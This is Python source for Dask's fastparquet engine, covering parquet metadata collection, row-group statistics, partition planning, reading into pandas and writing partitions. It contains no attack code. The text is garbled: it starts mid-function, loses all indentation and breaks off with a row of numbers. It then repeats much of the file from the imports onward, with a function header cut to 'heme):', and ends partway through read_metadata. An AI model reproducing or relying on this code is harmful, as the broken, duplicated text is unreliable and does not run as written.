filter_columns = {t[0] for t in flatten(filters or [], container=list)}
stat_col_indices = {}
_index_cols = index_cols if (gather_statistics and len(index_cols) == 1) else []
for i, name in enumerate(pf.columns):
if name in _index_cols or name in filter_columns:
stat_col_indices[name] = i
# Decide final `gather_statistics` setting.
# NOTE: The "fastparquet" engine requires statistics for
# filtering even if the filter is on a paritioned column
gather_statistics = _set_gather_statistics(
gather_statistics,
chunksize,
split_row_groups,
aggregation_depth,
filter_columns,
set(stat_col_indices) | filter_columns,
)
# Define common_kwargs
common_kwargs = {
"categories": categories_dict or categories,
"root_cats": pf.cats,
"root_file_scheme": pf.file_scheme,
"base_path": base_path,
**kwargs,
}
# Check if this is a very simple case where we can just
# return the path names. This requires that `parts`
# already be a list of paths. Also, we cannot be splitting
# by row-group or collecting statistics.
if (
gather_statistics is False
and not split_row_groups
and isinstance(parts, list)
and len(parts)
and isinstance(parts[0], str)
):
return (
[{"piece": (full_path, None)} for full_path in parts],
[],
common_kwargs,
)
dataset_info_kwargs = {
"fs": fs,
"split_row_groups": split_row_groups,
"gather_statistics": gather_statistics,
"filters": filters,
"dtypes": dtypes,
"stat_col_indices": stat_col_indices,
"aggregation_depth": aggregation_depth,
"chunksize": chunksize,
"root_cats": pf.cats,
"root_file_scheme": pf.file_scheme,
"base_path": "" if base_path is None else base_path,
"has_metadata_file": has_metadata_file,
}
if (
has_metadata_file
or metadata_task_size == 0
or metadata_task_size > len(paths)
):
# Construct the output-partitioning plan on the
# client process (in serial). This means we have
# a global _metadata file, or that `metadata_task_size`
# is zero or larger than the number of files.
pf_or_paths = pf if has_metadata_file else paths
parts, stats = cls._collect_file_parts(pf_or_paths, dataset_info_kwargs)
else:
# We DON'T have a global _metadata file to work with.
# We should loop over files in parallel
parts, stats = [], []
if paths:
# Build and compute a task graph to construct stats/parts
gather_parts_dsk = {}
name = "gather-pq-parts-" + tokenize(paths, dataset_info_kwargs)
finalize_list = []
for task_i, file_i in enumerate(
range(0, len(paths), metadata_task_size)
):
finalize_list.append((name, task_i))
gather_parts_dsk[finalize_list[-1]] = (
cls._collect_file_parts,
paths[file_i : file_i + metadata_task_size],
dataset_info_kwargs,
)
def _combine_parts(parts_and_stats):
parts, stats = [], []
for part, stat in parts_and_stats:
parts += part
if stat:
stats += stat
return parts, stats
gather_parts_dsk["final-" + name] = (_combine_parts, finalize_list)
parts, stats = Delayed("final-" + name, gather_parts_dsk).compute()
return parts, stats, common_kwargs
@classmethod
def _collect_file_parts(
cls,
pf_or_files,
dataset_info_kwargs,
):
# Collect necessary information from dataset_info
fs = dataset_info_kwargs["fs"]
split_row_groups = dataset_info_kwargs["split_row_groups"]
gather_statistics = dataset_info_kwargs["gather_statistics"]
stat_col_indices = dataset_info_kwargs["stat_col_indices"]
filters = dataset_info_kwargs["filters"]
dtypes = dataset_info_kwargs["dtypes"]
chunksize = dataset_info_kwargs["chunksize"]
aggregation_depth = dataset_info_kwargs["aggregation_depth"]
base_path = dataset_info_kwargs.get("base_path", None)
root_cats = dataset_info_kwargs.get("root_cats", None)
root_file_scheme = dataset_info_kwargs.get("root_file_scheme", None)
has_metadata_file = dataset_info_kwargs["has_metadata_file"]
# Get ParquetFile
if not isinstance(pf_or_files, fastparquet.api.ParquetFile):
# Construct local `ParquetFile` object
pf = ParquetFile(
pf_or_files,
open_with=fs.open,
root=base_path,
)
# Update hive-partitioning to match global cats/scheme
pf.cats = root_cats or {}
if root_cats:
pf.file_scheme = root_file_scheme
else:
# We already have a ParquetFile object to work with
pf = pf_or_files
# Organize row-groups by file
(
file_row_groups,
file_row_group_stats,
file_row_group_column_stats,
gather_statistics,
base_path,
) = cls._organize_row_groups(
pf,
split_row_groups,
gather_statistics,
stat_col_indices,
filters,
dtypes,
base_path,
has_metadata_file,
chunksize,
aggregation_depth,
)
# Convert organized row-groups to parts
parts, stats = _row_groups_to_parts(
gather_statistics,
split_row_groups,
aggregation_depth,
file_row_groups,
file_row_group_stats,
file_row_group_column_stats,
stat_col_indices,
cls._make_part,
make_part_kwargs={
"fs": fs,
"pf": pf,
"base_path": base_path,
"partitions": list(pf.cats),
},
)
return parts, stats
@classmethod
def read_metadata(
cls,
fs,
paths,
categories=None,
index=None,
gather_statistics=None,
filters=None,
split_row_groups=False,
chunksize=None,
aggregate_files=None,
ignore_metadata_file=False,
metadata_task_size=None,
parquet_file_extension=None,
**kwargs,
):
# Stage 1: Collect general dataset information
dataset_info = cls._collect_dataset_info(
paths,
fs,
categories,
index,
gather_statistics,
filters,
split_row_groups,
chunksize,
aggregate_files,
ignore_metadata_file,
metadata_task_size,
parquet_file_extension,
kwargs,
)
# Stage 2: Generate output `meta`
meta = cls._create_dd_meta(dataset_info)
# Stage 3: Generate parts and stats
parts, stats, common_kwargs = cls._construct_collection_plan(dataset_info)
# Cannot allow `None` in columns if the user has specified index=False
index = dataset_info["index"]
if index is False and None in meta.columns:
meta.drop(columns=[None], inplace=True)
# Add `common_kwargs` to the first element of `parts`.
# We can return as a separate element in the future, but
# should avoid breaking the API for now.
if len(parts):
parts[0]["common_kwargs"] = common_kwargs
parts[0]["aggregation_depth"] = dataset_info["aggregation_depth"]
if len(parts) and len(parts[0]["piece"]) == 1:
# Strip all partition-dependent or unnecessary
# data from the `ParquetFile` object
pf = dataset_info["pf"]
pf.row_groups = None
pf.fmd.row_groups = None
pf._statistics = None
parts[0]["common_kwargs"]["parquet_file"] = pf
return (meta, stats, parts, index)
@classmethod
def multi_support(cls):
return cls == FastParquetEngine
@classmethod
def read_partition(
cls,
fs,
pieces,
columns,
index,
categories=(),
root_cats=None,
root_file_scheme=None,
base_path=None,
**kwargs,
):
null_index_name = False
base_path = False if not root_cats else base_path
if isinstance(index, list):
if index == [None]:
# Handling a None-labeled index...
# The pandas metadata told us to read in an index
# labeled `None`. If this corresponds to a `RangeIndex`,
# fastparquet will need use the pandas metadata to
# construct the index. Otherwise, the index will correspond
# to a column named "__index_level_0__". We will need to
# check the `ParquetFile` object for this column below.
index = []
null_index_name = True
columns += index
# Use global `parquet_file` object. Need to reattach
# the desired row_group
parquet_file = kwargs.pop("parquet_file", None)
# Always convert pieces to list
if not isinstance(pieces, list):
pieces = [pieces]
sample = pieces[0]
if isinstance(sample, tuple):
if isinstance(sample[0], str):
# We have paths to read from
assert parquet_file is None
row_groups = []
rg_offset = 0
parquet_file = ParquetFile(
[p[0] for p in pieces],
open_with=fs.open,
root=base_path or False,
**kwargs.get("dataset", {}),
)
for piece in pieces:
_pf = (
parquet_file
if len(pieces) == 1
else ParquetFile(
piece[0],
open_with=fs.open,
root=base_path or False,
**kwargs.get("dataset", {}),
)
)
n_local_row_groups = len(_pf.row_groups)
local_rg_indices = piece[1] or list(range(n_local_row_groups))
row_groups += [
parquet_file.row_groups[rg + rg_offset]
for rg in local_rg_indices
]
rg_offset += n_local_row_groups
update_parquet_file = len(row_groups) < len(parquet_file.row_groups)
elif parquet_file:
row_groups = []
for piece in pieces:
# `piece[1]` will contain actual row-group objects,
# but they may be pickled
rgs = piece[0]
if isinstance(rgs, bytes):
rgs = pickle.loads(rgs)
row_groups += rgs
update_parquet_file = True
else:
raise ValueError("Neither path nor ParquetFile detected!")
if update_parquet_file:
with _FP_FILE_LOCK:
for rg in row_groups:
for chunk in rg.columns:
s = chunk.file_path
if s and isinstance(s, bytes):
chunk.file_path = s.decode()
parquet_file.fmd.row_groups = row_groups
# NOTE: May lose cats after `_set_attrs` call
save_cats = parquet_file.cats
parquet_file._set_attrs()
parquet_file.cats = save_cats
if null_index_name:
if "__index_level_0__" in parquet_file.columns:
# See "Handling a None-labeled index" comment above
index = ["__index_level_0__"]
columns += index
# Update hive-partitioning information if necessary
parquet_file.cats = root_cats or {}
if root_cats:
parquet_file.file_scheme = root_file_scheme
parquet_file._dtypes = (
lambda *args: parquet_file.dtypes
) # ugly patch, could be fixed
# Convert ParquetFile to pandas
return cls.pf_to_pandas(
parquet_file,
fs=fs,
columns=columns,
categories=categories,
index=index,
**kwargs.get("read", {}),
)
else:
# `sample` is NOT a tuple
raise ValueError(f"Expected tuple, got {type(sample)}")
@classmethod
def pf_to_pandas(
cls,
pf,
fs=None,
columns=None,
categories=None,
index=None,
open_file_options=None,
**kwargs,
):
# This method was mostly copied from the fastparquet
# `ParquetFile.to_pandas` definition. We maintain our
# own implmentation in Dask to enable better remote
# file-handling control
# Handle selected columns
if columns is not None:
columns = columns[:]
else:
columns = pf.columns + list(pf.cats)
if index:
columns += [i for i in index if i not in columns]
# Extract row-groups and pre-allocate df
rgs = pf.row_groups
size = sum(rg.num_rows for rg in rgs)
df, views = pf.pre_allocate(size, columns, categories, index)
start = 0
# Get a map of file names -> row-groups
fn_rg_map = defaultdict(list)
for rg in rgs:
fn = pf.row_group_filename(rg)
fn_rg_map[fn].append(rg)
# Define file-opening options
precache_options, open_file_options = _process_open_file_options(
open_file_options,
**(
{
"allow_precache": False,
"default_cache": "readahead",
}
if _is_local_fs(fs)
else {
"metadata": pf,
"columns": list(set(columns).intersection(pf.columns)),
"row_groups": [rgs for rgs in fn_rg_map.values()],
"default_engine": "fastparquet",
"default_cache": "readahead",
}
),
)
with ExitStack() as stack:
for fn, infile in zip(
fn_rg_map.keys(),
_open_input_files(
list(fn_rg_map.keys()),
fs=fs,
context_stack=stack,
precache_options=precache_options,
**open_file_options,
),
):
for rg in fn_rg_map[fn]:
thislen = rg.num_rows
parts = {
name: (
v
if name.endswith("-catdef")
else v[start : start + thislen]
)
for (name, v) in views.items()
}
# Add row-group data to df
pf.read_row_group_file(
rg,
columns,
categories,
index,
assign=parts,
partition_meta=pf.partition_meta,
infile=infile,
**kwargs,
)
start += thislen
return df
@classmethod
def initialize_write(
cls,
df,
fs,
path,
append=False,
partition_on=None,
ignore_divisions=False,
division_info=None,
schema=None,
object_encoding="utf8",
index_cols=None,
custom_metadata=None,
**kwargs,
):
if index_cols is None:
index_cols = []
if append and division_info is None:
ignore_divisions = True
fs.mkdirs(path, exist_ok=True)
if object_encoding == "infer" or (
isinstance(object_encoding, dict) and "infer" in object_encoding.values()
):
raise ValueError(
'"infer" not allowed as object encoding, '
"because this required data in memory."
)
metadata_file_exists = False
if append:
try:
# to append to a dataset without _metadata, need to load
# _common_metadata or any data file here
pf = fastparquet.api.ParquetFile(path, open_with=fs.open)
metadata_file_exists = fs.exists(fs.sep.join([path, "_metadata"]))
except (OSError, ValueError):
# append for create
append = False
if append:
if pf.file_scheme not in ["hive", "empty", "flat"]:
raise ValueError(
"Requested file scheme is hive, but existing file scheme is not."
)
elif (set(pf.columns) != set(df.columns) - set(partition_on)) or (
set(partition_on) != set(pf.cats)
):
raise ValueError(
"Appended columns not the same.\n"
"Previous: {} | New: {}".format(pf.columns, list(df.columns))
)
elif (pd.Series(pf.dtypes).loc[pf.columns] != df[pf.columns].dtypes).any():
raise ValueError(
"Appended dtypes differ.\n{}".format(
set(pf.dtypes.items()) ^ set(df.dtypes.items())
)
)
else:
df = df[pf.columns + partition_on]
fmd = pf.fmd
i_offset = fastparquet.writer.find_max_part(fmd.row_groups)
if not ignore_divisions:
if not set(index_cols).intersection([division_info["name"]]):
ignore_divisions = True
if not ignore_divisions:
minmax = fastparquet.api.sorted_partitioned_columns(pf)
# If fastparquet detects that a partitioned column isn't sorted, it won't
# appear in the resulting min/max dictionary
old_end = (
minmax[index_cols[0]]["max"][-1]
if index_cols[0] in minmax
else None
)
divisions = division_info["divisions"]
if old_end is None or divisions[0] <= old_end:
raise ValueError(
"Appended divisions overlapping with previous ones."
"\n"
"Previous: {} | New: {}".format(old_end, divisions[0])
)
else:
fmd = fastparquet.writer.make_metadata(
df._meta,
object_encoding=object_encoding,
index_cols=index_cols,
ignore_columns=partition_on,
**kwargs,
)
i_offset = 0
if custom_metadata is not None:
kvm = fmd.key_value_metadata or []
kvm.extend(
[
fastparquet.parquet_thrift.KeyValue(key=key, value=value)
for key, value in custom_metadata.items()
]
)
fmd.key_value_metadata = kvm
extra_write_kwargs = {"fmd": fmd}
return i_offset, fmd, metadata_file_exists, extra_write_kwargs
@classmethod
def write_partition(
cls,
df,
path,
fs,
filename,
partition_on,
return_metadata,
fmd=None,
compression=None,
custom_metadata=None,
**kwargs,
):
# Update key/value metadata if necessary
fmd = copy.copy(fmd)
for s in fmd.schema:
if isinstance(s.name, bytes):
# can be coerced to bytes on copy
s.name = s.name.decode()
if custom_metadata and fmd is not None:
fmd.key_value_metadata = fmd.key_value_metadata + (
[
fastparquet.parquet_thrift.KeyValue(key=key, value=value)
for key, value in custom_metadata.items()
]
)
if not len(df):
# Write nothing for empty partitions
rgs = []
elif partition_on:
mkdirs = lambda x: fs.mkdirs(x, exist_ok=True)
if parse_version(fastparquet.__version__) >= parse_version("0.1.4"):
rgs = partition_on_columns(
df, partition_on, path, filename, fmd, compression, fs.open, mkdirs
)
else:
rgs = partition_on_columns(
df,
partition_on,
path,
filename,
fmd,
fs.sep,
compression,
fs.open,
mkdirs,
)
else:
with fs.open(fs.sep.join([path, filename]), "wb") as fil:
fmd.num_rows = len(df)
rg = make_part_file(
fil, df, fmd.schema, compression=compression, fmd=fmd
)
for chunk in rg.columns:
chunk.file_path = filename
rgs = [rg]
if return_metadata:
return rgs
else:
return []
@classmethod
def write_metadata(cls, parts, meta, fs, path, append=False, **kwargs):
_meta = copy.copy(meta)
rgs = meta.row_groups
if parts:
for rg in parts:
if rg is not None:
if isinstance(rg, list):
for r in rg:
rgs.append(r)
else:
rgs.append(rg)
_meta.row_groups = rgs
fn = fs.sep.join([path, "_metadata"])
fastparquet.writer.write_common_metadata(
fn, _meta, open_with=fs.open, no_row_groups=False
)
# if appending, could skip this, but would need to check existence
fn = fs.sep.join([path, "_common_metadata"])
fastparquet.writer.write_common_metadata(fn, _meta, open_with=fs.open)
| 36.597372 | 96 | 0.51665 | import copy
import pickle
import threading
import warnings
from collections import OrderedDict, defaultdict
from contextlib import ExitStack
import numpy as np
import pandas as pd
import tlz as toolz
from packaging.version import parse as parse_version
from dask.core import flatten
try:
import fastparquet
from fastparquet import ParquetFile
from fastparquet.util import ex_from_sep, get_file_scheme, groupby_types, val_to_num
from fastparquet.writer import make_part_file, partition_on_columns
except ImportError:
pass
from dask.base import tokenize
heme):
if file_scheme in ["simple", "flat", "other"]:
cats = {}
return cats
cats = OrderedDict()
raw_cats = OrderedDict()
s = ex_from_sep("/")
paths = toolz.unique(paths)
if file_scheme == "hive":
partitions = toolz.unique((k, v) for path in paths for k, v in s.findall(path))
for key, val in partitions:
cats.setdefault(key, set()).add(val_to_num(val))
raw_cats.setdefault(key, set()).add(val)
else:
i_val = toolz.unique(
(i, val) for path in paths for i, val in enumerate(path.split("/")[:-1])
)
for i, val in i_val:
key = "dir%i" % i
cats.setdefault(key, set()).add(val_to_num(val))
raw_cats.setdefault(key, set()).add(val)
for key, v in cats.items():
raw = raw_cats[key]
if len(v) != len(raw):
conflicts_by_value = OrderedDict()
for raw_val in raw_cats[key]:
conflicts_by_value.setdefault(val_to_num(raw_val), set()).add(raw_val)
conflicts = [
c for k in conflicts_by_value.values() if len(k) > 1 for c in k
]
raise ValueError("Partition names map to the same value: %s" % conflicts)
vals_by_type = groupby_types(v)
if len(vals_by_type) > 1:
examples = [x[0] for x in vals_by_type.values()]
warnings.warn(
"Partition names coerce to values of different types, e.g. %s"
% examples
)
cats = OrderedDict([(key, list(v)) for key, v in cats.items()])
return cats
paths_to_cats = (
_paths_to_cats
)
class FastParquetEngine(Engine):
@classmethod
def _organize_row_groups(
cls,
pf,
split_row_groups,
gather_statistics,
stat_col_indices,
filters,
dtypes,
base_path,
has_metadata_file,
chunksize,
aggregation_depth,
):
pqpartitions = list(pf.cats)
if (
pqpartitions
and aggregation_depth
and pf.row_groups
and pf.row_groups[0].columns[0].file_path
):
pf.row_groups = sorted(
pf.row_groups,
key=lambda x: natural_sort_key(x.columns[0].file_path),
)
pandas_type = {}
if pf.row_groups and pf.pandas_metadata:
for c in pf.pandas_metadata.get("columns", []):
if "field_name" in c:
pandas_type[c["field_name"]] = c.get("pandas_type", None)
single_rg_parts = int(split_row_groups) == 1
file_row_groups = defaultdict(list)
file_row_group_stats = defaultdict(list)
file_row_group_column_stats = defaultdict(list)
cmax_last = {}
for rg, row_group in enumerate(pf.row_groups):
if (
pqpartitions
and filters
and fastparquet.api.filter_out_cats(row_group, filters)
):
continue
fp = row_group.columns[0].file_path
fpath = fp.decode() if isinstance(fp, bytes) else fp
if fpath is None:
if not has_metadata_file:
# row group is in the same file as the metadata.
# Assume this is a single-file dataset.
fpath = pf.fn
base_path = base_path or ""
else:
raise ValueError(
"Global metadata structure is missing a file_path string. "
"If the dataset includes a _metadata file, that file may "
"have one or more missing file_path fields."
)
# Append a tuple to file_row_groups. This tuple will
# be structured as: `(<local-row-group-id>, <global-row-group-id>)`
if file_row_groups[fpath]:
file_row_groups[fpath].append((file_row_groups[fpath][-1][0] + 1, rg))
else:
file_row_groups[fpath].append((0, rg))
if gather_statistics:
if single_rg_parts:
s = {
"file_path_0": fpath,
"num-rows": row_group.num_rows,
"total_byte_size": row_group.total_byte_size,
"columns": [],
}
else:
s = {
"num-rows": row_group.num_rows,
"total_byte_size": row_group.total_byte_size,
}
cstats = []
for name, i in stat_col_indices.items():
column = row_group.columns[i]
if column.meta_data.statistics:
cmin = None
cmax = None
# TODO: Avoid use of `pf.statistics`
if pf.statistics["min"][name][0] is not None:
cmin = pf.statistics["min"][name][rg]
cmax = pf.statistics["max"][name][rg]
elif dtypes[name] == "object":
cmin = column.meta_data.statistics.min_value
cmax = column.meta_data.statistics.max_value
# Older versions may not have cmin/cmax_value
if cmin is None:
cmin = column.meta_data.statistics.min
if cmax is None:
cmax = column.meta_data.statistics.max
# Decode bytes as long as "bytes" is not the
# expected `pandas_type` for this column
if (
isinstance(cmin, (bytes, bytearray))
and pandas_type.get(name, None) != "bytes"
):
cmin = cmin.decode("utf-8")
cmax = cmax.decode("utf-8")
if isinstance(cmin, np.datetime64):
tz = getattr(dtypes[name], "tz", None)
cmin = pd.Timestamp(cmin, tz=tz)
cmax = pd.Timestamp(cmax, tz=tz)
last = cmax_last.get(name, None)
if not (filters or chunksize or aggregation_depth):
# Only think about bailing if we don't need
if cmin is None or (last and cmin < last):
# we have an all-null partition, so lets bail.
#
# Note: This assumes ascending order.
#
gather_statistics = False
file_row_group_stats = {}
file_row_group_column_stats = {}
break
if single_rg_parts:
s["columns"].append(
{
"name": name,
"min": cmin,
"max": cmax,
}
)
else:
cstats += [cmin, cmax]
cmax_last[name] = cmax
else:
if (
not (filters or chunksize or aggregation_depth)
and column.meta_data.num_values > 0
):
# We are collecting statistics for divisions
# only (no filters) - Lets bail.
gather_statistics = False
file_row_group_stats = {}
file_row_group_column_stats = {}
break
if single_rg_parts:
s["columns"].append({"name": name})
else:
cstats += [None, None, None]
if gather_statistics:
file_row_group_stats[fpath].append(s)
if not single_rg_parts:
file_row_group_column_stats[fpath].append(tuple(cstats))
return (
file_row_groups,
file_row_group_stats,
file_row_group_column_stats,
gather_statistics,
base_path,
)
@classmethod
def _get_thrift_row_groups(
cls,
pf,
filename,
row_groups,
):
real_row_groups = []
for rg, rg_global in row_groups:
row_group = pf.row_groups[rg_global]
columns = row_group.columns
for c, col in enumerate(columns):
if c:
col.file_path = None
md = col.meta_data
md.key_value_metadata = None
# NOTE: Fastparquet may need the null count in the
# statistics, so we cannot just set statistics
# to none. Set attributes separately:
st = md.statistics
if st:
st.distinct_count = None
st.max = None
st.min = None
st.max_value = None
st.min_value = None
md.encodings = None
md.total_uncompressed_size = None
md.encoding_stats = None
row_group.columns = columns
real_row_groups.append(row_group)
return real_row_groups
@classmethod
def _make_part(
cls,
filename,
rg_list,
fs=None,
pf=None,
base_path=None,
partitions=None,
):
if partitions:
real_row_groups = cls._get_thrift_row_groups(
pf,
filename,
rg_list,
)
part = {"piece": (real_row_groups,)}
else:
# Get full path (empty strings should be ignored)
full_path = fs.sep.join([p for p in [base_path, filename] if p != ""])
row_groups = [rg[0] for rg in rg_list] # Don't need global IDs
part = {"piece": (full_path, row_groups)}
return part
@classmethod
def _collect_dataset_info(
cls,
paths,
fs,
categories,
index,
gather_statistics,
filters,
split_row_groups,
chunksize,
aggregate_files,
ignore_metadata_file,
metadata_task_size,
parquet_file_extension,
kwargs,
):
dataset_kwargs, read_kwargs, user_kwargs = _split_user_options(**kwargs)
parts = []
_metadata_exists = False
if len(paths) == 1 and fs.isdir(paths[0]):
base = paths[0]
_metadata_exists = True
if not ignore_metadata_file:
_metadata_exists = fs.isfile(fs.sep.join([base, "_metadata"]))
if ignore_metadata_file or not _metadata_exists:
paths, base, fns = _sort_and_analyze_paths(fs.find(base), fs)
_update_paths = False
for fn in ["_metadata", "_common_metadata"]:
try:
fns.remove(fn)
_update_paths = True
except ValueError:
pass
if _update_paths:
paths = [fs.sep.join([base, fn]) for fn in fns]
_metadata_exists = False
if _metadata_exists:
pf = ParquetFile(
fs.sep.join([base, "_metadata"]),
open_with=fs.open,
**dataset_kwargs,
)
else:
if parquet_file_extension:
len0 = len(paths)
paths = [
path for path in paths if path.endswith(parquet_file_extension)
]
if len0 and paths == []:
raise ValueError(
"No files satisfy the `parquet_file_extension` criteria "
f"(files must end with {parquet_file_extension})."
)
pf = ParquetFile(
paths[:1], open_with=fs.open, root=base, **dataset_kwargs
)
scheme = get_file_scheme(fns)
pf.file_scheme = scheme
pf.cats = paths_to_cats(fns, scheme)
if not gather_statistics:
parts = [fs.sep.join([base, fn]) for fn in fns]
else:
paths, base, fns = _sort_and_analyze_paths(paths, fs)
_metadata_exists = "_metadata" in fns
if _metadata_exists and ignore_metadata_file:
fns.remove("_metadata")
_metadata_exists = False
paths = [fs.sep.join([base, fn]) for fn in fns]
if _metadata_exists:
pf = ParquetFile(
fs.sep.join([base, "_metadata"]),
open_with=fs.open,
**dataset_kwargs,
)
else:
scheme = get_file_scheme(fns)
pf = ParquetFile(
paths[:1], open_with=fs.open, root=base, **dataset_kwargs
)
pf.file_scheme = scheme
pf.cats = paths_to_cats(fns, scheme)
if not gather_statistics:
parts = paths.copy()
aggregation_depth = _get_aggregation_depth(
aggregate_files,
list(pf.cats),
)
if pf.cats:
_partitions = [p for p in pf.cats if p not in pf.columns]
if not _partitions:
pf.cats = {}
elif len(_partitions) != len(pf.cats):
raise ValueError(
"No partition-columns should be written in the \n"
"file unless they are ALL written in the file.\n"
"columns: {} | partitions: {}".format(pf.columns, pf.cats.keys())
)
return {
"pf": pf,
"paths": paths,
"has_metadata_file": _metadata_exists,
"parts": parts,
"base": base,
"fs": fs,
"gather_statistics": gather_statistics,
"categories": categories,
"index": index,
"filters": filters,
"split_row_groups": split_row_groups,
"chunksize": chunksize,
"aggregate_files": aggregate_files,
"aggregation_depth": aggregation_depth,
"metadata_task_size": metadata_task_size,
"kwargs": {
"dataset": dataset_kwargs,
"read": read_kwargs,
**user_kwargs,
},
}
@classmethod
def _create_dd_meta(cls, dataset_info):
pf = dataset_info["pf"]
index = dataset_info["index"]
categories = dataset_info["categories"]
columns = None
pandas_md = pf.pandas_metadata
if pandas_md:
(
index_names,
column_names,
storage_name_mapping,
column_index_names,
) = _parse_pandas_metadata(pandas_md)
column_names.extend(pf.cats)
else:
index_names = []
column_names = pf.columns + list(pf.cats)
storage_name_mapping = {k: k for k in column_names}
column_index_names = [None]
if index is None and len(index_names) > 0:
if len(index_names) == 1 and index_names[0] is not None:
index = index_names[0]
else:
index = index_names
column_names, index_names = _normalize_index_columns(
columns, column_names, index, index_names
)
all_columns = index_names + column_names
categories_dict = None
if isinstance(categories, dict):
categories_dict = categories
if categories is None:
categories = pf.categories
elif isinstance(categories, str):
categories = [categories]
else:
categories = list(categories)
if categories and not set(categories).intersection(all_columns):
raise ValueError(
"categories not in available columns.\n"
"categories: {} | columns: {}".format(categories, list(all_columns))
)
dtypes = pf._dtypes(categories)
dtypes = {storage_name_mapping.get(k, k): v for k, v in dtypes.items()}
index_cols = index or ()
if isinstance(index_cols, str):
index_cols = [index_cols]
for ind in index_cols:
if getattr(dtypes.get(ind), "numpy_dtype", None):
dtypes[ind] = dtypes[ind].numpy_dtype
for cat in categories:
if cat in all_columns:
dtypes[cat] = pd.CategoricalDtype(categories=[UNKNOWN_CATEGORIES])
for catcol in pf.cats:
if catcol in all_columns:
dtypes[catcol] = pd.CategoricalDtype(categories=pf.cats[catcol])
meta = _meta_from_dtypes(all_columns, dtypes, index_cols, column_index_names)
dataset_info["dtypes"] = dtypes
dataset_info["index"] = index
dataset_info["index_cols"] = index_cols
dataset_info["categories"] = categories
dataset_info["categories_dict"] = categories_dict
return meta
@classmethod
def _construct_collection_plan(cls, dataset_info):
fs = dataset_info["fs"]
parts = dataset_info["parts"]
paths = dataset_info["paths"]
filters = dataset_info["filters"]
pf = dataset_info["pf"]
split_row_groups = dataset_info["split_row_groups"]
chunksize = dataset_info["chunksize"]
gather_statistics = dataset_info["gather_statistics"]
base_path = dataset_info["base"]
aggregation_depth = dataset_info["aggregation_depth"]
index_cols = dataset_info["index_cols"]
categories = dataset_info["categories"]
dtypes = dataset_info["dtypes"]
categories_dict = dataset_info["categories_dict"]
has_metadata_file = dataset_info["has_metadata_file"]
metadata_task_size = dataset_info["metadata_task_size"]
kwargs = dataset_info["kwargs"]
metadata_task_size = _set_metadata_task_size(
dataset_info["metadata_task_size"], fs
)
filter_columns = {t[0] for t in flatten(filters or [], container=list)}
stat_col_indices = {}
_index_cols = index_cols if (gather_statistics and len(index_cols) == 1) else []
for i, name in enumerate(pf.columns):
if name in _index_cols or name in filter_columns:
stat_col_indices[name] = i
gather_statistics = _set_gather_statistics(
gather_statistics,
chunksize,
split_row_groups,
aggregation_depth,
filter_columns,
set(stat_col_indices) | filter_columns,
)
common_kwargs = {
"categories": categories_dict or categories,
"root_cats": pf.cats,
"root_file_scheme": pf.file_scheme,
"base_path": base_path,
**kwargs,
}
if (
gather_statistics is False
and not split_row_groups
and isinstance(parts, list)
and len(parts)
and isinstance(parts[0], str)
):
return (
[{"piece": (full_path, None)} for full_path in parts],
[],
common_kwargs,
)
dataset_info_kwargs = {
"fs": fs,
"split_row_groups": split_row_groups,
"gather_statistics": gather_statistics,
"filters": filters,
"dtypes": dtypes,
"stat_col_indices": stat_col_indices,
"aggregation_depth": aggregation_depth,
"chunksize": chunksize,
"root_cats": pf.cats,
"root_file_scheme": pf.file_scheme,
"base_path": "" if base_path is None else base_path,
"has_metadata_file": has_metadata_file,
}
if (
has_metadata_file
or metadata_task_size == 0
or metadata_task_size > len(paths)
):
pf_or_paths = pf if has_metadata_file else paths
parts, stats = cls._collect_file_parts(pf_or_paths, dataset_info_kwargs)
else:
# We should loop over files in parallel
parts, stats = [], []
if paths:
# Build and compute a task graph to construct stats/parts
gather_parts_dsk = {}
name = "gather-pq-parts-" + tokenize(paths, dataset_info_kwargs)
finalize_list = []
for task_i, file_i in enumerate(
range(0, len(paths), metadata_task_size)
):
finalize_list.append((name, task_i))
gather_parts_dsk[finalize_list[-1]] = (
cls._collect_file_parts,
paths[file_i : file_i + metadata_task_size],
dataset_info_kwargs,
)
def _combine_parts(parts_and_stats):
parts, stats = [], []
for part, stat in parts_and_stats:
parts += part
if stat:
stats += stat
return parts, stats
gather_parts_dsk["final-" + name] = (_combine_parts, finalize_list)
parts, stats = Delayed("final-" + name, gather_parts_dsk).compute()
return parts, stats, common_kwargs
@classmethod
def _collect_file_parts(
cls,
pf_or_files,
dataset_info_kwargs,
):
# Collect necessary information from dataset_info
fs = dataset_info_kwargs["fs"]
split_row_groups = dataset_info_kwargs["split_row_groups"]
gather_statistics = dataset_info_kwargs["gather_statistics"]
stat_col_indices = dataset_info_kwargs["stat_col_indices"]
filters = dataset_info_kwargs["filters"]
dtypes = dataset_info_kwargs["dtypes"]
chunksize = dataset_info_kwargs["chunksize"]
aggregation_depth = dataset_info_kwargs["aggregation_depth"]
base_path = dataset_info_kwargs.get("base_path", None)
root_cats = dataset_info_kwargs.get("root_cats", None)
root_file_scheme = dataset_info_kwargs.get("root_file_scheme", None)
has_metadata_file = dataset_info_kwargs["has_metadata_file"]
# Get ParquetFile
if not isinstance(pf_or_files, fastparquet.api.ParquetFile):
# Construct local `ParquetFile` object
pf = ParquetFile(
pf_or_files,
open_with=fs.open,
root=base_path,
)
# Update hive-partitioning to match global cats/scheme
pf.cats = root_cats or {}
if root_cats:
pf.file_scheme = root_file_scheme
else:
# We already have a ParquetFile object to work with
pf = pf_or_files
# Organize row-groups by file
(
file_row_groups,
file_row_group_stats,
file_row_group_column_stats,
gather_statistics,
base_path,
) = cls._organize_row_groups(
pf,
split_row_groups,
gather_statistics,
stat_col_indices,
filters,
dtypes,
base_path,
has_metadata_file,
chunksize,
aggregation_depth,
)
# Convert organized row-groups to parts
parts, stats = _row_groups_to_parts(
gather_statistics,
split_row_groups,
aggregation_depth,
file_row_groups,
file_row_group_stats,
file_row_group_column_stats,
stat_col_indices,
cls._make_part,
make_part_kwargs={
"fs": fs,
"pf": pf,
"base_path": base_path,
"partitions": list(pf.cats),
},
)
return parts, stats
@classmethod
def read_metadata(
cls,
fs,
paths,
categories=None,
index=None,
gather_statistics=None,
filters=None,
split_row_groups=False,
chunksize=None,
aggregate_files=None,
ignore_metadata_file=False,
metadata_task_size=None,
parquet_file_extension=None,
**kwargs,
):
# Stage 1: Collect general dataset information
dataset_info = cls._collect_dataset_info(
paths,
fs,
categories,
index,
gather_statistics,
filters,
split_row_groups,
chunksize,
aggregate_files,
ignore_metadata_file,
metadata_task_size,
parquet_file_extension,
kwargs,
)
# Stage 2: Generate output `meta`
meta = cls._create_dd_meta(dataset_info)
# Stage 3: Generate parts and stats
parts, stats, common_kwargs = cls._construct_collection_plan(dataset_info)
